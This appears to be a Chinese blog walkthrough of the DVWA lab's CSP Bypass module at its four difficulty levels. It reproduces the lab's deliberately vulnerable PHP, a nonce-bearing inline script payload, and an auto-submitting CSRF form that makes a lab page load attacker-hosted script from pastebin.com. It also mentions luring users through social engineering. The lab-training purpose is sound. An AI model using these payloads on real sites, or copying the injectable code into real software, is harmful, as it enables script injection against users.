往期博文:
DVWA靶场-Brute Force Source 暴力破解
DVWA靶场-Weak Session IDs 脆弱的Session
靶场环境搭建
目录
Content Security Policy (CSP) Bypass
Content Security Policy (CSP) Bypass
Low CSP
核心代码
<?php
// allows js from self, pastebin.com, jquery and google analytics.
$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;";
header($headerCSP);
# https://pastebin.com/raw/R570EE00
?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
<script src='" . $_POST['include'] . "'></script>
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
<p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p>
<input size="50" type="text" name="include" value="" id="include" />
<input type="submit" value="Include" />
</form>
';
?>
分析代码,发现允许的白名单网址有 self https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com
这里作者也是给出了题解的
其中 https://pastebin.com 是一个快速文本分享网站
我们可以在里面写入攻击代码
创建成功后,点击raw
生成攻击页面
将这个网址输入到文本框中,点击include 包含这个文本进来,成功弹框
查看源代码,发现这个网址已经被包含到进来了
我们可以结合CSRF 攻击更加自动化
本地服务器新建一个攻击网页,csp_csrf.html
<form id="csp" name="csp" method="POST" action="http://192.168.1.200/DVWA-master/vulnerabilities/csp/">
<input size="50" type="text" name="include" value="" id="include">
<script>
var cspb = document.getElementById("csp");
cspb[0].value="https://pastebin.com/raw/rcBeKDgL";
cspb.submit();
</script>
</form>
使用社工等手段,诱使用户点击该网站链接,即可攻击成功
Medium CSP
核心代码
<?php
$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";
header($headerCSP);
// Disable XSS protections so that inline alert boxes will work
header ("X-XSS-Protection: 0");
# <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>
?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
" . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
<p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
<input size="50" type="text" name="include" value="" id="include" />
<input type="submit" value="Include" />
</form>
';
?>
看到大佬的WP 说script-src这里还设置了特殊值
unsafe-inline:允许执行页面内嵌的<script>标签和事件监听函数
nonce:每次HTTP回应给出一个授权 token,页面内嵌脚本必须有这个 token,才会执行
这里就是使用了unsafe-inline 和nonce ,所以页面内嵌脚本,必须有这个token才可以执行
查看页面源代码
<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>
High CSP
核心代码
<?php
$headerCSP = "Content-Security-Policy: script-src 'self';";
header($headerCSP);
?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
" . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
<p>The page makes a call to ' . DVWA_WEB_PAGE_TO_ROOT . '/vulnerabilities/csp/source/jsonp.php to load some code. Modify that page to run your own code.</p>
<p>1+2+3+4+5=<span id="answer"></span></p>
<input type="button" id="solve" value="Solve the sum" />
</form>
<script src="source/high.js"></script>
';
?>
这里的CSP过滤规则 就比较恶心了,只允许加载self 也就是本页面的脚本
我们跟进去查看这个页面的源代码
//会生成一个script 标签
function clickButton() {
var s = document.createElement("script");
s.src = "source/jsonp.php?callback=solveSum";
document.body.appendChild(s);
}
function solveSum(obj) {
if ("answer" in obj) {
document.getElementById("answer").innerHTML = obj['answer'];
}
}
//监听到solve 按钮,就会调用clickButton() 函数
var solve_button = document.getElementById ("solve");
if (solve_button) {
solve_button.addEventListener("click", function() {
clickButton();
});
}
分析代码,可使用攻击post请求提交参数,具体攻击方法如下
impossible CSP
核心代码
<?php
$headerCSP = "Content-Security-Policy: script-src 'self';";
header($headerCSP);
?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
" . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
<p>Unlike the high level, this does a JSONP call but does not use a callback, instead it hardcodes the function to call.</p><p>The CSP settings only allow external JavaScript on the local server and no inline code.</p>
<p>1+2+3+4+5=<span id="answer"></span></p>
<input type="button" id="solve" value="Solve the sum" />
</form>
<script src="source/impossible.js"></script>
';
function clickButton() {
var s = document.createElement("script");
s.src = "source/jsonp_impossible.php";
document.body.appendChild(s);
}
function solveSum(obj) {
if ("answer" in obj) {
document.getElementById("answer").innerHTML = obj['answer'];
}
}
var solve_button = document.getElementById ("solve");
if (solve_button) {
solve_button.addEventListener("click", function() {
clickButton();
});
}
防范很到位